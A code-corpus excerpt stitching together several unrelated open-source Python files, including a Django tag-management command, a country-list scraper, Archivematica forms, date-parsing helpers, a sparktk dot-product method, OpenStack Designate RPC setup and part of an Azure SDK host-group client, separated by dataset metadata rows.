sys.stdout.write(colorize(str(text), **kwargs) + '\n')
def notice(text, **kwargs):
log(text, fg='blue')
def exit(text, **kwargs):
log(text, fg='red')
sys.exit(1)
class Command(BaseCommandWithSubcommands):
help = "Manage tags"
def add_arguments(self, parser):
super().add_arguments(parser)
count = self.subs.add_parser('count', help='Count tag usage')
count.add_argument('name', help='Tag name we want to count.')
count.set_defaults(func=self.count)
delete = self.subs.add_parser('delete', help='Delete tag')
delete.add_argument('name', help='Tag name we want to delete.')
delete.add_argument('--force', action='store_true',
help='Force delete even if tag is still used.')
delete.set_defaults(func=self.delete)
rename = self.subs.add_parser('rename', help='Rename a tag')
rename.add_argument('old', help='Old name.')
rename.add_argument('new', help='New name.')
rename.set_defaults(func=self.rename)
replace = self.subs.add_parser('replace',
help='Replace tag by another and delete it')
replace.add_argument('old', help='Old tag name.')
replace.add_argument('new', help='New tag name.')
replace.set_defaults(func=self.replace)
sanitize = self.subs.add_parser('sanitize',
help=('Sanitize existing tags.\n'
'Remove duplicates, clean characters...'))
sanitize.set_defaults(func=self.sanitize)
list_ = self.subs.add_parser('list', help='List tags')
list_.set_defaults(func=self.list)
def handle(self, *args, **options):
log('-'*80, fg='white')
return super().handle(*args, **options)
def _count(self, name):
return TaggedItem.objects.filter(tag__name=name).count()
def get_tag_or_exit(self, name):
tag = Tag.objects.filter(name=name).first()
if not tag:
exit('No tag found with name "{}"'.format(name))
return tag
def count(self, options):
count = self._count(options['name'])
notice('{count} object(s) tagged with "{name}"'.format(count=count,
**options))
def delete(self, options):
name = options['name']
tag = self.get_tag_or_exit(name)
count = self._count(name)
force = options.get('force')
if count and not force:
confirm = input('Tag "{}" is still linked to {} items.\n'
'Type "yes" to confirm delete or "no" to '
'cancel: '.format(name, count))
if confirm != 'yes':
exit("Delete cancelled.")
tag.delete()
notice('Deleted tag "{name}".'.format(**options))
def rename(self, options):
if options['old'] == options['new']:
exit('Nothing to rename, tags are equal.')
tag = self.get_tag_or_exit(options['old'])
if Tag.objects.filter(name=options['new']).exclude(pk=tag.pk).exists():
exit('Tag "{new}" already exists. Aborting.'.format(**options))
tag.name = options['new']
tag.save()
notice('Renamed "{old}" to "{new}".'.format(**options))
def replace(self, options):
if options['old'] == options['new']:
exit('Nothing to rename, tags are equal.')
old = self.get_tag_or_exit(options['old'])
new, created = Tag.objects.get_or_create(name=options['new'])
if created:
notice('Created tag "{new}"'.format(**options))
relations = TaggedItem.objects.filter(tag=old)
for relation in relations:
content = relation.content_object
notice('Processing "{}"'.format(repr(content)))
relation.delete()
content.tags.add(new)
old.delete()
notice('Deleted "{}"'.format(old))
def list(self, options):
row = '{:<40}{:<40}{}'
print(row.format('name', 'slug', 'count'))
print(row.format('.' * 40, '.' * 40, '.' * 40))
for tag in Tag.objects.order_by('slug'):
print(row.format(tag.name, tag.slug, self._count(tag.name)))
def sanitize(self, options):
all_tags = ((sanitize_tag_name(t.name), t) for t in Tag.objects.all())
all_tags = sorted(all_tags, key=itemgetter(0))
all_tags = groupby(all_tags, key=itemgetter(0))
for new_tag_name, tags in all_tags:
tags = (t[1] for t in tags)
if not new_tag_name:
# No need to delete relation, happy cascading !
for tag in tags:
tag.delete()
continue
tag = next(tags)
other_equivalent_tags = list(tags)
# All the relations we need to redirect to `tag`
other_relations = TaggedItem.objects.filter(
tag__in=other_equivalent_tags)
for relation in other_relations:
# if an object `o` is tagged with tag `foo` and `Foo`, the
# relation `o-Foo` must be change to `o-foo`. But this relation
# already exists, so, instead, we must delete `o-Foo`,
# not change it.
existing_relations = TaggedItem.objects.filter(
tag=tag,
object_id=relation.content_object.id,
content_type = relation.content_type)
if not existing_relations.exists():
# We must change the relation
relation.tag = tag
relation.save()
else:
# We have existing relation(s).
# We should not have more than one because we cannot have
# the *exact* same relation twice but let's be safe :
# delete any extra relation.
extra_relations = list(existing_relations)[1:]
for rel in extra_relations:
rel.delete()
# Then delete the current relation because we know we have
# an existing relation.
relation.delete()
# There is no relation to other tags left, delete them.
for t in other_equivalent_tags:
t.delete()
# Be sure our tag is correctly renamed.
# We do it at the end because the tag's name is unique and so,
# we want to be sure that all potential duplicates have been
# deleted/changed.
tag.name = new_tag_name
tag.save()
|
agpl-3.0
| -4,190,601,327,684,026,000
| 38.477528
| 79
| 0.552156
| false
| 4.22042
| false
| false
| false
|
hanteng/country-groups
|
scripts/_construct_data_EU-Asia.py
|
1
|
4189
|
# -*- coding: utf-8 -*-
#歧視無邊,回頭是岸。鍵起鍵落,情真情幻。
# Correction
import os.path, glob
import requests
from lxml.html import fromstring, tostring, parse
from io import StringIO, BytesIO
import codecs
import pandas as pd
import json
XML_encoding="utf-8"
# Data source
URL_ = "https://ec.europa.eu/europeaid/regions/asia-0_en"
URL_country_names_template = "https://raw.githubusercontent.com/hanteng/country-names/master/data/CLDR_country_name_{locale}.tsv"
URL_country_names = URL_country_names_template.format(locale= 'en')
# Xpath extraction
_xpath = '//*[@id="block-views-8eba70350aa66960065a1bb4224c751a"]/div/div/div/div/ul/li/a/text()'
## Outpuing Lists
PE = 'EU-Asia'
path_data = u'../data'
outputfn1 = os.path.join(path_data, "PE_org.json")
outputfn2 = os.path.join(path_data, "CLDR_UN_region.tsv")
def url_request (url):
r = requests.get(url)
if r.status_code == 200:
#r.raw.decode_content = True
return r
else:
print ("Downloading the data from {0} failed. Plese check Internet connections.".format(XML_src_url))
return None
def url_local_request (url):
fn_local = os.path.join(path_data, PE+ ".htm")
print (fn_local) #debug
try:
tree = parse(fn_local)
except:
r = url_request (url)
XML_src=r.content
with codecs.open(fn_local, "w", XML_encoding) as file:
file.write(XML_src.decode(XML_encoding))
#from lxml.html.clean import clean_html
#XML_src = clean_html(XML_src)
tree = fromstring(XML_src)
return tree
t = url_local_request(URL_)
list_country_names_Web = t.xpath(_xpath) # Based on the network map http://www.tein.asia/tein4/network/maps.do TW is included and 24 listed
print (list_country_names_Web)
## Retrive data directly from unicode-cldr project hosted at github
print ("Retrieve country names data now ...")
locale = "en"
url = URL_country_names_template.format(locale=locale)
df_results = pd.read_csv(url, sep='\t', encoding='utf-8',
na_values=[], keep_default_na = False,
names = ['c','n'] , index_col='c',
)
## Construct dictionary for country/region names
c_names = df_results.to_dict()['n'] #http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_dict.html
c_names_inv = {v: k for k, v in c_names.items()}
## Country names fuzzy match
from fuzzywuzzy import process
choice=[]
for i, c_name_Web in enumerate(list_country_names_Web):
#found_candidates = [x for x in c_names_inv.keys() if fuzzy_match(x,c_name_Web)==True]
found_candidate = process.extract(c_name_Web, c_names_inv.keys(), limit=1)
found_candidate_c = c_names_inv[found_candidate[0][0]]
choice_item = [i, c_name_Web, found_candidate, found_candidate_c]
#print (choice_item)
choice.append(choice_item)
import ast
done = False
while not(done):
try:
# Note: Python 2.x users should use raw_input, the equivalent of 3.x's input
prn= [repr(x) for x in choice]
print ("\n\r".join(prn))
i = int(input("Please enter your corrections: Serial no (-1:None): "))
if i==-1:
print ("Done!")
done==True
break
else:
if i in range(len(choice)):
c = input("Please enter your corrections: Country code (ISO-alpha2): ")
choice[i][3] = c
else:
print("Sorry, Please revise your input.")
except ValueError:
print("Sorry, I didn't understand that.")
#better try again... Return to the start of the loop
continue
list_country_codes_Web = [x[3] for x in choice]
print (list_country_codes_Web)
print (list_country_names_Web)
print ("==========")
PE_org = dict()
with codecs.open(outputfn1, encoding='utf-8', mode='r+') as fp:
lines=fp.readlines()
PE_org = json.loads(u"".join(lines))
print ("Before:", PE_org.keys())
d={PE: list_country_codes_Web}
print("Adding:",d)
PE_org.update(d)
print ("After:", PE_org.keys())
with codecs.open(outputfn1, encoding='utf-8', mode='w') as fp:
json.dump(PE_org, fp)
|
gpl-3.0
| 8,520,566,600,957,169,000
| 29.962687
| 140
| 0.633888
| false
| 3.091654
| false
| false
| false
|
eckardm/archivematica
|
src/dashboard/src/components/archival_storage/forms.py
|
1
|
1245
|
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
from django import forms
class CreateAICForm(forms.Form):
results = forms.CharField(label=None, required=True, widget=forms.widgets.HiddenInput())
class ReingestAIPForm(forms.Form):
METADATA_ONLY = 'metadata'
OBJECTS = 'objects'
REINGEST_CHOICES = (
(METADATA_ONLY, 'Re-ingest metadata only'),
(OBJECTS, 'Re-ingest metadata and objects')
)
reingest_type = forms.ChoiceField(choices=REINGEST_CHOICES, widget=forms.RadioSelect, required=True)
|
agpl-3.0
| -1,230,661,360,885,088,800
| 37.90625
| 105
| 0.746185
| false
| 3.705357
| false
| false
| false
|
petropavel13/2photo-api
|
utils.py
|
1
|
3700
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # py2
from datetime import datetime
from django.utils import timezone as tz
from django.utils.timezone import is_naive, make_aware
msk_tz = tz.pytz.timezone('Europe/Moscow')
date_mapping = {
'января': '1',
'февраля': '2',
'марта': '3',
'апреля': '4',
'мая': '5',
'июня': '6',
'июля': '7',
'августа': '8',
'сентября': '9',
'октября': '10',
'ноября': '11',
'декабря': '12',
}
def to_msk_datetime(datetime):
if is_naive(datetime):
return datetime.replace(tzinfo=msk_tz)
elif datetime.tzinfo == msk_tz:
return datetime
else:
return tz.localtime(datetime, msk_tz)
def if_not_none(func):
return lambda arg: None if arg is None else func(arg)
@if_not_none
def prct_to_int(percent):
return int(percent[:percent.index('%')])
@if_not_none
def url_to_id(url):
str_id = url[url.rindex('/') + 1:]
return int(str_id) if len(str_id) > 0 else None
def ru_str_date_to_date_stream(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
py2_date = new_date.encode('utf-8')
py3_format = '%d %m %Y г. %H:%M'
py2_format = py3_format.encode('utf-8')
date = datetime.strptime(py2_date if isinstance(py2_date, str) else new_date,
py2_format if isinstance(py2_format, str) else py3_format)
return to_msk_datetime(date)
def ru_str_date_to_date_comment(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
str_date = new_date.replace('\n ', '').replace(' ', '')
py3_date = '0' + str_date if str_date.index(':') == 1 else str_date
py2_date = py3_date.encode('utf-8')
py3_format = '%H:%M,%d %m %Y г.'
py2_format = py3_format.encode('utf-8')
date = datetime.strptime(py2_date if isinstance(py2_date, str) else py3_date,
py2_format if isinstance(py2_format, str) else py3_format)
return to_msk_datetime(date)
def ru_str_date_to_date_reg(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
return to_msk_datetime(datetime.strptime(new_date, '%d %m %Y'))
def ru_str_date_to_date_last_visit(ru_date):
new_date = ru_date
for ru, en in date_mapping.items():
new_date = new_date.replace(ru, en)
date = datetime.strptime(new_date, '%d %m %Y, %H:%M')
return to_msk_datetime(date)
def clean_dict_for_model(dict_obj, dj_model):
return { f.name : dict_obj[f.name] for f in dj_model._meta.fields }
def dict_to_model_instance(dict_obj, dj_model):
return dj_model( **clean_dict_for_model(dict_obj, dj_model) )
def bulk_create_by_chunks(iterable_objects, dj_model, chunk_size=1024):
buffer = [None] * chunk_size
next_idx = 0
for obj in iterable_objects:
buffer[next_idx] = obj
next_idx += 1
if next_idx % chunk_size == 0:
dj_model.objects.bulk_create(buffer)
next_idx = 0
dj_model.objects.bulk_create(buffer[0:next_idx])
def namedtuples_to_model_instances_generator(namedtuples, dj_model):
for namedtuple in namedtuples:
yield dict_to_model_instance(namedtuple._asdict(), dj_model)
def bulk_save_namedtuples(namedtuples, dj_model, chunk_size=1024):
model_instances_generator = namedtuples_to_model_instances_generator(namedtuples, dj_model)
bulk_create_by_chunks(model_instances_generator, dj_model, chunk_size)
|
mit
| -4,624,639,881,835,006,000
| 24.549296
| 95
| 0.617971
| false
| 2.829953
| false
| false
| false
|
shibanis1/spark-tk
|
python/sparktk/frame/ops/dot_product.py
|
1
|
3552
|
def dot_product(self, left_column_names,right_column_names,dot_product_column_name,default_left_values=None,default_right_values=None):
"""
Calculate dot product for each row in current frame.
Parameters
----------
:param left_column_names: (List[str]) Names of columns used to create the left vector (A) for each row.
Names should refer to a single column of type vector, or two or more columns of numeric scalars.
:param right_column_names: (List[str]) Names of columns used to create right vector (B) for each row.
Names should refer to a single column of type vector, or two or more columns of numeric scalars.
:param dot_product_column_name: (str) Name of column used to store the dot product.
:param default_left_values: (Optional[List[float]) Default values used to substitute null values in left vector.Default is None.
:param default_right_values: (Optional[List[float]) Default values used to substitute null values in right vector.Default is None.
:return: (Frame) returns a frame with give "dot_product" column name
Calculate the dot product for each row in a frame using values from two equal-length sequences of columns.
Dot product is computed by the following formula:
The dot product of two vectors :math:`A=[a_1, a_2, ..., a_n]` and :math:`B =[b_1, b_2, ..., b_n]` is :math:`a_1*b_1 + a_2*b_2 + ...+ a_n*b_n`.
The dot product for each row is stored in a new column in the existing frame.
Notes
-----
* If default_left_values or default_right_values are not specified, any null values will be replaced by zeros.
* This method applies only to columns containing numerical data.
Examples
--------
>>> data = [[1, 0.2, -2, 5], [2, 0.4, -1, 6], [3, 0.6, 0, 7], [4, 0.8, 1, 8]]
>>> schema = [('col_0', int), ('col_1', float),('col_2', int) ,('col_3', int)]
>>> my_frame = tc.frame.create(data, schema)
<progress>
Calculate the dot product for a sequence of columns in Frame object *my_frame*:
>>> my_frame.inspect()
[#] col_0 col_1 col_2 col_3
===============================
[0] 1 0.2 -2 5
[1] 2 0.4 -1 6
[2] 3 0.6 0 7
[3] 4 0.8 1 8
Modify the frame by computing the dot product for a sequence of columns:
>>> my_frame.dot_product(['col_0','col_1'], ['col_2', 'col_3'], 'dot_product')
<progress>
>>> my_frame.inspect()
[#] col_0 col_1 col_2 col_3 dot_product
============================================
[0] 1 0.2 -2 5 -1.0
[1] 2 0.4 -1 6 0.4
[2] 3 0.6 0 7 4.2
[3] 4 0.8 1 8 10.4
"""
if not isinstance(left_column_names, list):
left_column_names = [left_column_names]
if not isinstance(right_column_names, list):
right_column_names = [right_column_names]
self._scala.dotProduct(self._tc.jutils.convert.to_scala_list_string(left_column_names),
self._tc.jutils.convert.to_scala_list_string(right_column_names),
dot_product_column_name,
self._tc.jutils.convert.to_scala_option_list_double(default_left_values),
self._tc.jutils.convert.to_scala_option_list_double(default_right_values))
|
apache-2.0
| -7,716,103,984,630,105,000
| 46.36
| 146
| 0.561937
| false
| 3.62449
| false
| false
| false
|
bjoernmainz/simple-contact-form
|
images/bin/rename_speech.py
|
1
|
1168
|
#!/usr/bin/python
import os
import glob
import shutil
def rename(files):
new_files = []
for f in files:
dirname = os.path.dirname(f)
basename = os.path.basename(f)
filetype = ""
number = ""
print("------------")
print("Basename: %s") % basename
if not basename.find("ogg") == -1:
file_type = "ogg";
number = basename.replace(".ogg", "")
elif not basename.find("mp3") == -1:
file_type = "mp3";
number = basename.replace(".mp3", "")
else:
raise("Not found")
print "Number: %s" % number
new_number = blist[number]
new_filename = "%s/%s_new.%s" % (dirname, blist[number], file_type)
print("%s -> %s") % (f, new_filename)
shutil.move(f, new_filename)
new_files.append(new_filename)
#print blist
fileh = open("../../config/list.txt.php")
blist = {}
for f in fileh:
f = f.rstrip()
f = f.split("|")
f[1] = f[1].rstrip()
blist[f[1]] = f[0]
globber = glob.glob("../captcha/speech/de/*.ogg")
rename(globber)
globber = glob.glob("../captcha/speech/de/*.mp3")
rename(globber)
globber = glob.glob("../captcha/speech/en/*.ogg")
rename(globber)
globber = glob.glob("../captcha/speech/en/*.mp3")
rename(globber)
|
gpl-2.0
| 4,740,280,325,139,808,000
| 20.236364
| 69
| 0.605308
| false
| 2.648526
| false
| false
| false
|
openstack/designate
|
designate/rpc.py
|
1
|
8026
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import threading
from oslo_config import cfg
import oslo_messaging as messaging
from oslo_messaging.rpc import dispatcher as rpc_dispatcher
from oslo_serialization import jsonutils
from designate import objects
import designate.context
import designate.exceptions
__all__ = [
'init',
'cleanup',
'set_defaults',
'add_extra_exmods',
'clear_extra_exmods',
'get_allowed_exmods',
'RequestContextSerializer',
'get_client',
'get_server',
'get_notifier',
]
CONF = cfg.CONF
EXPECTED_EXCEPTION = threading.local()
NOTIFICATION_TRANSPORT = None
NOTIFIER = None
TRANSPORT = None
# NOTE: Additional entries to designate.exceptions goes here.
ALLOWED_EXMODS = [
designate.exceptions.__name__,
'designate.backend.impl_dynect'
]
EXTRA_EXMODS = []
def init(conf):
global TRANSPORT, NOTIFIER, NOTIFICATION_TRANSPORT
exmods = get_allowed_exmods()
TRANSPORT = create_transport(get_transport_url())
NOTIFICATION_TRANSPORT = messaging.get_notification_transport(
conf, allowed_remote_exmods=exmods)
serializer = RequestContextSerializer(JsonPayloadSerializer())
NOTIFIER = messaging.Notifier(NOTIFICATION_TRANSPORT,
serializer=serializer)
def initialized():
return None not in [TRANSPORT, NOTIFIER, NOTIFICATION_TRANSPORT]
def cleanup():
global TRANSPORT, NOTIFIER, NOTIFICATION_TRANSPORT
if TRANSPORT is None:
raise AssertionError("'TRANSPORT' must not be None")
if NOTIFICATION_TRANSPORT is None:
raise AssertionError("'NOTIFICATION_TRANSPORT' must not be None")
if NOTIFIER is None:
raise AssertionError("'NOTIFIER' must not be None")
TRANSPORT.cleanup()
NOTIFICATION_TRANSPORT.cleanup()
TRANSPORT = NOTIFICATION_TRANSPORT = NOTIFIER = None
def set_defaults(control_exchange):
messaging.set_transport_defaults(control_exchange)
def add_extra_exmods(*args):
EXTRA_EXMODS.extend(args)
def clear_extra_exmods():
del EXTRA_EXMODS[:]
def get_allowed_exmods():
return ALLOWED_EXMODS + EXTRA_EXMODS + CONF.allowed_remote_exmods
class JsonPayloadSerializer(messaging.NoOpSerializer):
@staticmethod
def serialize_entity(context, entity):
return jsonutils.to_primitive(entity, convert_instances=True)
class DesignateObjectSerializer(messaging.NoOpSerializer):
def _process_iterable(self, context, action_fn, values):
"""Process an iterable, taking an action on each value.
:param:context: Request context
:param:action_fn: Action to take on each item in values
:param:values: Iterable container of things to take action on
:returns: A new container of the same type (except set) with
items from values having had action applied.
"""
iterable = values.__class__
if iterable == set:
# NOTE: A set can't have an unhashable value inside, such as
# a dict. Convert sets to tuples, which is fine, since we can't
# send them over RPC anyway.
iterable = tuple
return iterable([action_fn(context, value) for value in values])
def serialize_entity(self, context, entity):
if isinstance(entity, (tuple, list, set)):
entity = self._process_iterable(context, self.serialize_entity,
entity)
elif hasattr(entity, 'to_primitive') and callable(entity.to_primitive):
entity = entity.to_primitive()
return jsonutils.to_primitive(entity, convert_instances=True)
def deserialize_entity(self, context, entity):
if isinstance(entity, dict) and 'designate_object.name' in entity:
entity = objects.DesignateObject.from_primitive(entity)
elif isinstance(entity, (tuple, list, set)):
entity = self._process_iterable(context, self.deserialize_entity,
entity)
return entity
class RequestContextSerializer(messaging.Serializer):
def __init__(self, base):
self._base = base
def serialize_entity(self, context, entity):
if not self._base:
return entity
return self._base.serialize_entity(context, entity)
def deserialize_entity(self, context, entity):
if not self._base:
return entity
return self._base.deserialize_entity(context, entity)
def serialize_context(self, context):
return context.to_dict()
def deserialize_context(self, context):
return designate.context.DesignateContext.from_dict(context)
def get_transport_url(url_str=None):
return messaging.TransportURL.parse(CONF, url_str)
def get_client(target, version_cap=None, serializer=None):
if TRANSPORT is None:
raise AssertionError("'TRANSPORT' must not be None")
if serializer is None:
serializer = DesignateObjectSerializer()
serializer = RequestContextSerializer(serializer)
return messaging.RPCClient(
TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer
)
def get_server(target, endpoints, serializer=None):
if TRANSPORT is None:
raise AssertionError("'TRANSPORT' must not be None")
if serializer is None:
serializer = DesignateObjectSerializer()
serializer = RequestContextSerializer(serializer)
access_policy = rpc_dispatcher.DefaultRPCAccessPolicy
return messaging.get_rpc_server(
TRANSPORT,
target,
endpoints,
executor='eventlet',
serializer=serializer,
access_policy=access_policy
)
def get_notification_listener(targets, endpoints, serializer=None, pool=None):
if NOTIFICATION_TRANSPORT is None:
raise AssertionError("'NOTIFICATION_TRANSPORT' must not be None")
if serializer is None:
serializer = JsonPayloadSerializer()
return messaging.get_notification_listener(
NOTIFICATION_TRANSPORT,
targets,
endpoints,
executor='eventlet',
pool=pool,
serializer=serializer
)
def get_notifier(service=None, host=None, publisher_id=None):
if NOTIFIER is None:
raise AssertionError("'NOTIFIER' must not be None")
if not publisher_id:
publisher_id = "%s.%s" % (service, host or CONF.host)
return NOTIFIER.prepare(publisher_id=publisher_id)
def create_transport(url):
exmods = get_allowed_exmods()
return messaging.get_rpc_transport(CONF,
url=url,
allowed_remote_exmods=exmods)
def expected_exceptions():
def outer(f):
@functools.wraps(f)
def exception_wrapper(self, *args, **kwargs):
if not hasattr(EXPECTED_EXCEPTION, 'depth'):
EXPECTED_EXCEPTION.depth = 0
EXPECTED_EXCEPTION.depth += 1
# We only want to wrap the first function wrapped.
if EXPECTED_EXCEPTION.depth > 1:
return f(self, *args, **kwargs)
try:
return f(self, *args, **kwargs)
except designate.exceptions.DesignateException as e:
if e.expected:
raise rpc_dispatcher.ExpectedException()
raise
finally:
EXPECTED_EXCEPTION.depth = 0
return exception_wrapper
return outer
|
apache-2.0
| -4,182,365,424,016,584,000
| 31.626016
| 79
| 0.661974
| false
| 4.246561
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2020_06_01/aio/operations/_dedicated_host_groups_operations.py
|
1
|
21434
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DedicatedHostGroupsOperations:
"""DedicatedHostGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def create_or_update(
self,
resource_group_name: str,
host_group_name: str,
parameters: "_models.DedicatedHostGroup",
**kwargs: Any
) -> "_models.DedicatedHostGroup":
"""Create or update a dedicated host group. For details of Dedicated Host and Dedicated Host
Groups please see [Dedicated Host Documentation]
(https://go.microsoft.com/fwlink/?linkid=2082596).
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:param parameters: Parameters supplied to the Create Dedicated Host Group.
:type parameters: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DedicatedHostGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'DedicatedHostGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
async def update(
self,
resource_group_name: str,
host_group_name: str,
parameters: "_models.DedicatedHostGroupUpdate",
**kwargs: Any
) -> "_models.DedicatedHostGroup":
"""Update an dedicated host group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:param parameters: Parameters supplied to the Update Dedicated Host Group operation.
:type parameters: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroupUpdate
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DedicatedHostGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'DedicatedHostGroupUpdate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
host_group_name: str,
**kwargs: Any
) -> None:
"""Delete a dedicated host group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
